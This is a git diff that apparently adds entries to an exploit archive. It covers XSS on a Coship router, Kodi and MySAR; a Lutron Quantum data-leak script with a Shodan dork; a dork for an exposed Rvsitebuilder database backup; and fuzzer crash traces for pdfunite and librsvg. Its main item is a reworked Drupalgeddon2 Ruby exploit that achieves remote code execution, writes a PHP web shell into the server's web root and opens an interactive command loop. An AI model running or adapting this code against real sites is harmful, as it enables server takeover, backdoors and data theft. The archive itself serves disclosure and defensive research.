diff --git a/exploits/hardware/webapps/44320.txt b/exploits/hardware/webapps/44320.txt
new file mode 100644
index 000000000..09a3261f6
--- /dev/null
+++ b/exploits/hardware/webapps/44320.txt
@@ -0,0 +1,26 @@
+######################################################################################
+# Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting (XSS)
+# Date: 2018-03-18
+# Exploit Author: Sayan Chatterjee
+# Vendor Homepage: http://en.coship.com/
+# Category: Hardware (Wifi Router)
+# Version: 4.0.0.48
+# Tested on: Windows 10
+# CVE: CVE-2018-8772
+#######################################################################################
+
+Proof of Concept
+=================
+URL: http://192.168.1.254 (Wifi Router Gateway)
+Attack Vector : Network Name(SSID)
+Payload :
+
+Reproduction Steps:
+------------------------------
+1. Access the wifi router gateway [i.e, http://192.168.1.254]
+2. Go to "Wireless Setting" -> "Basic"
+3. Update "Network Name(SSID)" field with ''
+4. Save the settings.
+5. Go to "System Status" and you will be having "S@Y@N" popup.
+
+#######################################################################################
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44488.py b/exploits/hardware/webapps/44488.py
new file mode 100755
index 000000000..5dabe1804
--- /dev/null
+++ b/exploits/hardware/webapps/44488.py
@@ -0,0 +1,69 @@
+'''
+
+# Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware
+# Date: 20-03-2018
+# Exploit Author: David Castro
+# Contact: https://twitter.com/SadFud75
+# Vendor Homepage: http://www.lutron.com
+# Software Link: http://www.lutron.com/en-US/Products/Pages/WholeBuildingSystems/Quantum/Overview.aspx
+# Version: Lutron Quantum 2.0 - 3.2.243 firmware
+# CVE : CVE-2018-8880
+# Shodan dork: html:"
LUTRON
"
+
+Python 2.7 Output:
+
+Leaking data from HOST
+[+] Device info:
+
+MAC: 000FE702A999
+PRODUCT FAMILY: Gulliver
+PRODUCT TYPE: Processor
+SERIAL NUMBER: 007B24B4
+GUID: 0DFB959BD0D8784DA9501B958F099779
+CODE VERSION: 7.5.0
+
+[+] Network info:
+
+INTERNAL IP: 192.168.0.2
+SUBNET MASK: 255.255.255.0
+GATEWAY: 192.168.0.1
+TELNET PORT: 23
+FTP PORT: 21
+REMOTE PORT: 51023
+
+[+] Done.
+
+'''
+
+
+import requests
+from bs4 import BeautifulSoup
+
+ip = raw_input("Enter target ip: ")
+port = raw_input("Enter target port: ")
+
+print 'Leaking data from ' + 'http://' + ip + ":" + port
+r = requests.get('http://' + ip + ":" + port + '/deviceIP')
+resultado = r.text
+parseado = BeautifulSoup(resultado, "lxml")
+
+print '[+] Device info:'
+print ''
+print 'MAC: ' + parseado.find('input', {'name': 'MacAddr'}).get('value')
+print 'PRODUCT FAMILY: ' + parseado.find('input', {'name': 'PRODFAM'}).get('value')
+print 'PRODUCT TYPE: ' + parseado.find('input', {'name': 'PRODTYPE'}).get('value')
+print 'SERIAL NUMBER: ' + parseado.find('input', {'name': 'SERNUM'}).get('value')
+print 'GUID: ' + parseado.find('input', {'name': 'GUID'}).get('value')
+print 'CODE VERSION: ' + parseado.find('input', {'name': 'CODEVER'}).get('value')
+print ''
+print '[+] Network info:'
+print ''
+print 'INTERNAL IP: ' + parseado.find('input', {'name': 'IPADDR'}).get('value')
+print 'SUBNET MASK: ' + parseado.find('input', {'name': 'SUBNETMK'}).get('value')
+print 'GATEWAY: ' + parseado.find('input', {'name': 'GATEADDR'}).get('value')
+print 'TELNET PORT: ' + parseado.find('input', {'name': 'TELPORT'}).get('value')
+print 'FTP PORT: ' + parseado.find('input', {'name': 'FTPPORT'}).get('value')
+print 'REMOTE PORT: ' + parseado.find('input', {'name': 'REMOTEPORT'}).get('value')
+print ''
+print '[+] Done.'
+print ''
\ No newline at end of file
diff --git a/exploits/linux/dos/44490.txt b/exploits/linux/dos/44490.txt
new file mode 100644
index 000000000..3599abc0c
--- /dev/null
+++ b/exploits/linux/dos/44490.txt
@@ -0,0 +1,68 @@
+# Exploit Title: PDFunite Malformed pdf buffer overflow
+# Date: 17 April 2018
+# Exploit Author: Hamm3r.py
+# Vendor Homepage: https://launchpad.net/ubuntu/artful/+package/poppler-utils
+# Software Link: https://launchpad.net/ubuntu/+source/poppler/0.57.0-2ubuntu4.2
+# Version: 0.41.0
+# Tested on: Ubuntu
+# CVE :
+
+pdfunite is a part of poppler package in ubuntu. pdfunite is prone to a
+local bufferoverflow when a malformed pdf is used to unite with another
+pdf.
+Following is the gdb stack trace:
+
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+0x00007ffff7abf948 in XRef::getEntry(int, bool) () from
+/usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#0 0x00007ffff7abf948 in XRef::getEntry(int, bool) () from
+/usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#1 0x00007ffff7aa8867 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#2 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#3 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#4 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#5 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#6 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#7 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#8 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#9 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#10 0x00007ffff7aa8bae in PDFDoc::markPageObjects(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#11 0x000000000040271a in ?? ()
+#12 0x00007ffff722d830 in __libc_start_main (main=0x401b20, argc=4,
+argv=0x7fffffffe0b8, init=, fini=,
+rtld_fini=, stack_end=0x7fffffffe0a8) at
+../csu/libc-start.c:291
+#13 0x0000000000403179 in ?? ()
+
+
+$ pdfunite -v
+pdfunite version 0.41.0
+
+
+#This issue is identified by Hamm3r.py, a general purpose fuzzer!
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44490.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/44491.txt b/exploits/multiple/dos/44491.txt
new file mode 100644
index 000000000..1dd65fabb
--- /dev/null
+++ b/exploits/multiple/dos/44491.txt
@@ -0,0 +1,100 @@
+# Exploit Title: Buffer-overflow in RSVG while converting a malformed svg
+# Date: 17 April 2018
+# Exploit Author: Hamm3r.py
+# Vendor Homepage: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin
+# Software Link: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin
+# Version: Ubuntu: 2.40.13 (Default version that is shipped with ubuntu) and MAC 2.42.2
+# Tested on: Ubuntu 16.04 and MAC 10.13.3
+
+
+RSVG throws a segmentation fault when malformed SVG is submitted as input.
+
+Steps to reproduce:
+rsvg test.png
+
+
+GDB Stacktrace below:
+Starting program: /usr/bin/rsvg fuzzed_fdiA0xdf5OQPYsN hello.png
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+_fill_xrgb32_lerp_opaque_spans (abstract_renderer=0x7fffffffbea0, y=18219,
+h=1, spans=,
+num_spans=) at
+../../../../src/cairo-image-compositor.c:2249
+2249 ../../../../src/cairo-image-compositor.c: No such file or directory.
+(gdb) backtrace
+#0 0x00007ffff6fd35c0 in _fill_xrgb32_lerp_opaque_spans
+(abstract_renderer=0x7fffffffbea0, y=18219, h=1, spans=,
+num_spans=) at ../../../../src/cairo-image-compositor.c:2249
+#1 0x00007ffff7017921 in _cairo_tor_scan_converter_generate (xmax=248,
+xmin=192, height=1, y=18219, spans=0x63e438, renderer=0x7fffffffbea0,
+cells=)
+at ../../../../src/cairo-tor-scan-converter.c:1643
+#2 0x00007ffff7017921 in _cairo_tor_scan_converter_generate
+(renderer=0x7fffffffbea0, antialias=1, winding_mask=,
+converter=) at
+../../../../src/cairo-tor-scan-converter.c:1794
+#3 0x00007ffff7017921 in _cairo_tor_scan_converter_generate
+(converter=0x63d3b0, renderer=0x7fffffffbea0)
+at ../../../../src/cairo-tor-scan-converter.c:1857
+#4 0x00007ffff7009c33 in composite_polygon
+(extents=extents@entry=0x7fffffffd780,
+polygon=polygon@entry=0x7fffffffd360,
+fill_rule=fill_rule@entry=CAIRO_FILL_RULE_WINDING,
+antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT,
+compositor=0x7ffff72b2040 , compositor=0x7ffff72b2040 )
+at ../../../../src/cairo-spans-compositor.c:801
+#5 0x00007ffff700a6a5 in clip_and_composite_polygon
+(compositor=compositor@entry=0x7ffff72b2040 ,
+extents=extents@entry=0x7fffffffd780,
+polygon=polygon@entry=0x7fffffffd360, fill_rule=CAIRO_FILL_RULE_WINDING,
+antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT) at
+../../../../src/cairo-spans-compositor.c:967
+#6 0x00007ffff700b5d3 in _cairo_spans_compositor_fill
+(_compositor=0x7ffff72b2040 , extents=0x7fffffffd780,
+path=, fill_rule=CAIRO_FILL_RULE_WINDING,
+tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT) at
+../../../../src/cairo-spans-compositor.c:1174
+#7 0x00007ffff6fc5a90 in _cairo_compositor_fill (compositor=0x7ffff72b2040
+, surface=0x6399a0, op=, source=,
+path=0x639768, fill_rule=CAIRO_FILL_RULE_WINDING,
+tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0)
+at ../../../../src/cairo-compositor.c:203
+#8 0x00007ffff6fd7127 in _cairo_image_surface_fill
+(abstract_surface=, op=, source=, path=, fill_rule=, tolerance=, antialias=, clip=0x0) at
+../../../../src/cairo-image-surface.c:985
+#9 0x00007ffff700e7d7 in _cairo_surface_fill (surface=0x6399a0,
+op=CAIRO_OPERATOR_OVER, source=0x7fffffffdb50, path=0x639768,
+fill_rule=CAIRO_FILL_RULE_WINDING, tolerance=0.10000000000000001,
+antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0) at
+../../../../src/cairo-surface.c:2341
+#10 0x00007ffff6fce14c in _cairo_gstate_fill (gstate=0x630c00,
+path=path@entry=0x639768)
+at ../../../../src/cairo-gstate.c:1317
+#11 0x00007ffff6fc7279 in _cairo_default_context_fill (abstract_cr=0x639400)
+at ../../../../src/cairo-default-context.c:1055
+#12 0x00007ffff6fc02b5 in cairo_fill (cr=0x639400) at
+../../../../src/cairo.c:2205
+#13 0x00007ffff7bc9e95 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#14 0x00007ffff7bc6272 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#15 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#16 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#17 0x00007ffff7bbd982 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#18 0x00007ffff7bbe298 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#19 0x00007ffff7bca9e3 in rsvg_handle_render_cairo_sub () at
+/usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+
+
+Version:
+$rsvg-convert --version
+rsvg-convert version 2.42.2
+
+#This issue is identified by Hamm3r.py, a general purpose fuzzer!
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44491.zip
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44487.txt b/exploits/multiple/webapps/44487.txt
new file mode 100644
index 000000000..a1267a293
--- /dev/null
+++ b/exploits/multiple/webapps/44487.txt
@@ -0,0 +1,82 @@
+=============================================
+MGC ALERT 2018-003
+- Original release date: March 19, 2018
+- Last revised: April 16, 2018
+- Discovered by: Manuel Garcia Cardenas
+- Severity: 4,8/10 (CVSS Base Score)
+- CVE-ID: CVE-2018-8831
+=============================================
+
+I. VULNERABILITY
+-------------------------
+Kodi <= 17.6 - Persistent Cross-Site Scripting
+
+II. BACKGROUND
+-------------------------
+Kodi (formerly XBMC) is a free and open-source media player software
+application developed by the XBMC Foundation, a non-profit technology
+consortium. Kodi is available for multiple operating systems and hardware
+platforms, with a software 10-foot user interface for use with televisions
+and remote controls.
+
+III. DESCRIPTION
+-------------------------
+Has been detected a Persistent XSS vulnerability in the web interface of
+Kodi, that allows the execution of arbitrary HTML/script code to be
+executed in the context of the victim user's browser.
+
+IV. PROOF OF CONCEPT
+-------------------------
+Go to: Playlist -> Create
+
+Create a playlist injecting javascript code:
+
+
+
+The XSS is executed, in the victim browser.
+
+V. BUSINESS IMPACT
+-------------------------
+An attacker can execute arbitrary HTML or script code in a targeted user's
+browser, this can leverage to steal sensitive information as user
+credentials, personal data, etc.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+Kodi <= 17.6
+
+VII. SOLUTION
+-------------------------
+Vendor include the fix:
+https://trac.kodi.tv/ticket/17814
+
+VIII. REFERENCES
+-------------------------
+https://kodi.tv/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+March 19, 2018 1: Initial release
+April 16, 2018 2: Last revision
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+March 19, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
+March 19, 2018 2: Send to vendor
+March 30, 2018 3: Vendo fix
+April 16, 2018 4: Sent to lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
\ No newline at end of file
diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb
index b9a1bda11..e476524c6 100755
--- a/exploits/php/webapps/44449.rb
+++ b/exploits/php/webapps/44449.rb
@@ -1,27 +1,10 @@
#!/usr/bin/env ruby
#
-# Hans Topo & g0tmi1k's ruby port of Drupalggedon2 exploit ~ https://github.com/dreadlocked/Drupalgeddon2/ (EDBID: 44449 ~ https://www.exploit-db.com/exploits/44449/)
-# Based on Vitalii Rudnykh exploit ~ https://github.com/a2u/CVE-2018-7600 (EDBID: 44448 ~ https://www.exploit-db.com/exploits/44448/)
-# Hans Topo ~ https://github.com/dreadlocked
-# g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
+# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
#
-# Drupal Advisory ~ https://www.drupal.org/sa-core-2018-002
-# Vulnerable Versions:
-# < 7.58
-# 8.x < 8.3.9
-# 8.4.x < 8.4.6 (TESTED)
-# 8.5.x < 8.5.1 (TESTED)
-#
-# WriteUp & Thx ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/
-# REF phpinfo() ~ https://twitter.com/i_bo0om/status/984674893768921089 (curl - user/register - mail - #post_render)
-# REF phpinfo() ~ https://twitter.com/RicterZ/status/984495201354854401 (burp - user//edit [requires auth] - mail - #lazy_builder)
-# REF 2x RCE ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708 (curl - user/register - mail & timezone - #lazy_builder & #post_render)
-# REF RCE ~ https://gist.github.com/AlbinoDrought/626c07ee96bae21cb174003c9c710384 (curl - user/register - mail - #post_render)
-# REF rev_nc ~ https://gist.github.com/AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4 (curl - user/register - mail - #post_render)
-# Collection ~ https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
-#
-#
-# Drupal Version ~ https://example.com/CHANGELOG.txt
+# Authors:
+# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
+# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
#
@@ -29,114 +12,297 @@ require 'base64'
require 'json'
require 'net/http'
require 'openssl'
+require 'readline'
-# Proxy information (nil to disable)
+# Settings - Proxy information (nil to disable)
proxy_addr = nil
proxy_port = 8080
-# Quick how to use
-if ARGV.empty?
- puts "Usage: ruby drupalggedon2.rb "
- puts " ruby drupalgeddon2.rb https://example.com whoami"
- exit
+# Settings - General
+$useragent = "drupalgeddon2"
+webshell = "s.php"
+writeshell = true
+
+
+# Settings - Payload (we could just be happy without this, but we can do better!)
+#bashcmd = "'
+bashcmd = "&1' ); }"
+bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Function http_post [post]
+def http_post(url, payload="")
+ uri = URI(url)
+ request = Net::HTTP::Post.new(uri.request_uri)
+ request.initialize_http_header({"User-Agent" => $useragent})
+ request.body = payload
+ return $http.request(request)
end
+
+# Function gen_evil_url
+def gen_evil_url(evil, feedback=true)
+ # PHP function to use (don't forget about disabled functions...)
+ phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
+
+ #puts "[*] PHP cmd: #{phpmethod}" if feedback
+ puts "[*] Payload: #{evil}" if feedback
+
+ ## Check the version to match the payload
+ # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
+ if $drupalverion.start_with?('8')
+ # Method #1 - Drupal 8, mail, #post_render - response is 200
+ url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+ payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
+
+ # Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
+ #url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+ #payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
+ elsif $drupalverion.start_with?('7')
+ # Method #3 - Drupal 7, name, #post_render - response is 200
+ url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
+ payload = "form_id=user_pass&_triggering_element_name=name"
+ else
+ puts "[!] Unsupported Drupal version"
+ exit
+ end
+
+ # Drupal v7 needs an extra value from a form
+ if $drupalverion.start_with?('7')
+ response = http_post(url, payload)
+
+ form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
+ puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
+
+ #url = $target + "file/ajax/name/%23value/" + form_build_id
+ url = $target + "?q=file/ajax/name/%23value/" + form_build_id
+ payload = "form_build_id=" + form_build_id
+ end
+
+ return url, payload
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Quick how to use
+if ARGV.empty?
+ puts "Usage: ruby drupalggedon2.rb "
+ puts " ruby drupalgeddon2.rb https://example.com"
+ exit
+end
# Read in values
-target = ARGV[0]
-command = ARGV[1]
+$target = ARGV[0]
+
+
+# Check input for protocol
+if not $target.start_with?('http')
+ $target = "http://#{target}"
+end
+# Check input for the end
+if not $target.end_with?('/')
+ $target += "/"
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Banner
puts "[*] --==[::#Drupalggedon2::]==--"
puts "-"*80
+puts "[*] Target : #{$target}"
+puts "[*] Write? : Skipping writing web shell" if not writeshell
+puts "-"*80
-# Check input for protocol
-if not target.start_with?('http')
- target = "http://" + target
-end
-
-# Check input for the end
-if not target.end_with?('/')
- target += "/"
-end
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-# Payload
-#evil = 'uname -a'
-evil = ''
-evil = "echo " + Base64.encode64(evil).strip + " | base64 -d | tee s.php"
+# Setup connection
+uri = URI($target)
+$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
-# PHP function to use
-phpmethod = 'exec'
-
-
-# Feedback
-puts "[*] Target : " + target
-puts "[*] Command: " + command
-puts "[*] PHP cmd: " + phpmethod
-
-
-# Method #1 - timezone & lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
-#url = target + 'user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
-# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render
-#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
-
-
-# Method #2 - mail & post_render - response is 200
-url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
-# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render
-payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
-
-
-uri = URI(url)
-http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
-
# Use SSL/TLS if needed
-if uri.scheme == 'https'
- http.use_ssl = true
- http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+if uri.scheme == "https"
+ $http.use_ssl = true
+ $http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Try and get version
+$drupalverion = nil
+# Possible URLs
+url = [
+ $target + "CHANGELOG.txt",
+ $target + "core/CHANGELOG.txt",
+ $target + "includes/bootstrap.inc",
+ $target + "core/includes/bootstrap.inc",
+]
+# Check all
+url.each do|uri|
+ # Check response
+ response = http_post(uri)
+
+ if response.code == "200"
+ puts "[+] Found : #{uri} (#{response.code})"
+
+ # Patched already?
+ puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
+
+ # Try and get version from the file contents
+ $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
+
+ # If not, try and get it from the URL
+ $drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
+
+ # Done!
+ break
+ elsif response.code == "403"
+ puts "[+] Found : #{uri} (#{response.code})"
+
+ # Get version from URL
+ $drupalverion = uri.match(/core/)? "8.x" : "7.x"
+ else
+ puts "[!] MISSING: #{uri} (#{response.code})"
+ end
end
-# Make the request
-req = Net::HTTP::Post.new(uri.request_uri)
-req.body = payload
# Feedback
-puts "[*] Payload: " + evil
-#puts "[*] Sending: " + payload
-puts "-"*80
-
-
-# Check response
-response = http.request(req)
-if response.code == "200"
- puts "[+] Target seems to be exploitable! w00hooOO!"
- puts "[+] Result: " + JSON.pretty_generate(JSON[response.body] )
+if $drupalverion
+ status = $drupalverion.end_with?('x')? "?" : "!"
+ puts "[+] Drupal#{status}: #{$drupalverion}"
else
- puts "[!] Target does NOT seem to be exploitable ~ Response: " + response.code
- #exit
+ puts "[!] Didn't detect Drupal version"
+ puts "[!] Forcing Drupal v8.x attack"
+ $drupalverion = "8.x"
end
-
-
-# Feedback
-puts "-"*80
-puts "[*] curl '" + target + "s.php?c=#{command}'"
puts "-"*80
-# Now run our command
-exploit_uri = URI(target + "s.php?c=#{command}")
-# Check response
-response = Net::HTTP.get_response(exploit_uri)
-if response.code != "200"
- puts "[!] Exploit FAILED ~ Response: " + response.code
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+
+# Make a request, testing code execution
+puts "[*] Testing: Code Execution"
+# Generate a random string to see if we can echo it
+random = (0...8).map { (65 + rand(26)).chr }.join
+url, payload = gen_evil_url("echo #{random}")
+response = http_post(url, payload)
+if response.code == "200" and not response.body.empty?
+ #result = JSON.pretty_generate(JSON[response.body])
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ puts "[+] Result : #{result}"
+
+ puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
+else
+ puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
exit
end
+puts "-"*80
-# Result
-puts "[+] Output: " + response.body
\ No newline at end of file
+# Location of web shell & used to signal if using PHP shell
+webshellpath = nil
+prompt = "drupalgeddon2"
+# Possibles paths to try
+paths = [
+ "./",
+ "./sites/default/",
+ "./sites/default/files/",
+]
+# Check all
+paths.each do|path|
+ puts "[*] Testing: File Write To Web Root (#{path})"
+
+ # Merge locations
+ webshellpath = "#{path}#{webshell}"
+
+ # Final command to execute
+ cmd = "#{bashcmd} | tee #{webshellpath}"
+
+ # Generate evil URLs
+ url, payload = gen_evil_url(cmd)
+ # Make the request
+ response = http_post(url, payload)
+ # Check result
+ if response.code == "200" and not response.body.empty?
+ # Feedback
+ #result = JSON.pretty_generate(JSON[response.body])
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ puts "[+] Result : #{result}"
+
+ # Test to see if backdoor is there (if we managed to write it)
+ response = http_post("#{$target}#{webshellpath}", "c=hostname")
+ if response.code == "200" and not response.body.empty?
+ puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
+ break
+ else
+ puts "[!] Target is NOT exploitable. No write access here!"
+ end
+ else
+ puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
+ end
+ webshellpath = nil
+end if writeshell
+puts "-"*80 if writeshell
+
+if webshellpath
+ # Get hostname for the prompt
+ prompt = response.body.to_s.strip
+
+ # Feedback
+ puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'"
+elsif writeshell
+ puts "[!] FAILED to find writeable folder"
+ puts "[*] Dropping back to ugly shell..."
+end
+
+
+# Stop any CTRL + C action ;)
+trap("INT", "SIG_IGN")
+
+
+# Forever loop
+loop do
+ # Default value
+ result = "ERROR"
+
+ # Get input
+ command = Readline.readline("#{prompt}>> ", true).to_s
+
+ # Exit
+ break if command =~ /exit/
+
+ # Blank link?
+ next if command.empty?
+
+ # If PHP shell
+ if webshellpath
+ # Send request
+ result = http_post("#{$target}#{webshell}", "c=#{command}").body
+ # Direct commands
+ else
+ url, payload = gen_evil_url(command, false)
+ response = http_post(url, payload)
+ if response.code == "200" and not response.body.empty?
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ end
+ end
+
+ # Feedback
+ puts result
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/44483.txt b/exploits/php/webapps/44483.txt
new file mode 100644
index 000000000..9719a5d12
--- /dev/null
+++ b/exploits/php/webapps/44483.txt
@@ -0,0 +1,24 @@
+# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
+# Date: 14-13-2018
+# Software Link: https://sourceforge.net/projects/mysar/
+# Exploit Author: Keerati T.
+# Version: 2.1.4
+# Tested on: Linux
+
+1. Description
+SQL injection and Cross site script vulnerabilities are found on ALL
+parameter of MySAR.
+
+2. Proof of Concept
+FOR EXAMPLE
+- SQL injection
+http://server/mysar/index.php?a=IPSummary&date=[SQLi]
+-XSS
+http://server/mysar/index.php?a=IPSummary&date=2018-04-14
+">
+
+3. Timeline
+8-3-2018 - Report on their Github. (
+https://github.com/coffnix/mysar-ng/issues/12)
+-- 1 month later, no any response from vendor. --
+14-4-2018 - Public.
\ No newline at end of file
diff --git a/exploits/php/webapps/44484.txt b/exploits/php/webapps/44484.txt
new file mode 100644
index 000000000..c4b1f3467
--- /dev/null
+++ b/exploits/php/webapps/44484.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Rvsitebuilder CMS Database Backup Download
+# Exploit Author: Hesam Bazvand
+# Contact: black.king066@gmail.com
+# Software Link: http://www.rvsitebuilder.com
+# Version: All Version
+# Tested on: Windows 7 / Kali Linux
+# Category: WebApps
+# Dork : inurl:rvsindex.php & /rvsindex.php?/user/login
+
+*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
+
+Exploit :
+ Http://Target/rvsDbBackup.sql
\ No newline at end of file
diff --git a/exploits/php/webapps/44486.txt b/exploits/php/webapps/44486.txt
new file mode 100644
index 000000000..18a84dbbe
--- /dev/null
